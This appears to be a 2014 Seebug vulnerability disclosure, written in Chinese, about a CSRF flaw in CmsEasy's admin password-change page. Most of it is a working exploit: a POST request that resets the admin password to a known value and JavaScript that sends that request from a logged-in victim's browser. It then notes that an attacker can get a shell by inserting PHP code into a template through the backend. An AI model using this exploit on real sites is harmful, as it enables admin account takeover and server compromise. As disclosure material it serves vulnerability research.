Cmseasy建站系统csrf获取管理权限后台getshell

2014-08-07T00:00:00
ID SSV:94068
Type seebug
Reporter Root
Modified 2014-08-07T00:00:00

Description

简要描述:

Cmseasy建站系统csrf获取管理权限后台getshell

详细说明:

在修改管理密码处存在csrf漏洞 http://localhost/cmseasy/uploads/index.php?case=table&act=edit&table=user&id=1&admin_dir=admin&site=default post: onlymodify=&username=admin&passwordnew=456456&nickname=%E7%AE%A1%E7%90%86%E5%91%98&question=&answer=&groupid=2&qq=0&e_mail=&tel=&submit=%E6%8F%90%E4%BA%A4 可通过csrf修改管理密码:

``` function ajax(){ var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<versions.length; i++) { try { request = new ActiveXObject(versions[i]); } catch(e) {} } } return request; }var _x = ajax(); postgo(); function postgo() { src="http://localhost/cmseasy/uploads/index.php?case=table&act=edit&table=user&id=1&admin_dir=admin&site=default"; data="onlymodify=&username=admin&passwordnew=456456&nickname=%E7%AE%A1%E7%90%86%E5%91%98&question=&answer=&groupid=2&qq=0&e_mail=&tel=&submit=%E6%8F%90%E4%BA%A4" xhr_act("POST",src,data);

} function xhr_act(_m,_s,_a){ _x.open(_m,_s,false);
cookie = document.cookie; if(_m=="POST"){ _x.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); _x.setRequestHeader("Cookie",cookie); } _x.send(_a); return _x.responseText; } ```

后台编辑模板 插入php代码可getshell

漏洞证明:

<img src="https://images.seebug.org/upload/201408/071655212230bde338ce0e10c040a13194325114.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201408/07165534389772af43d107660645d01df58e5090.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">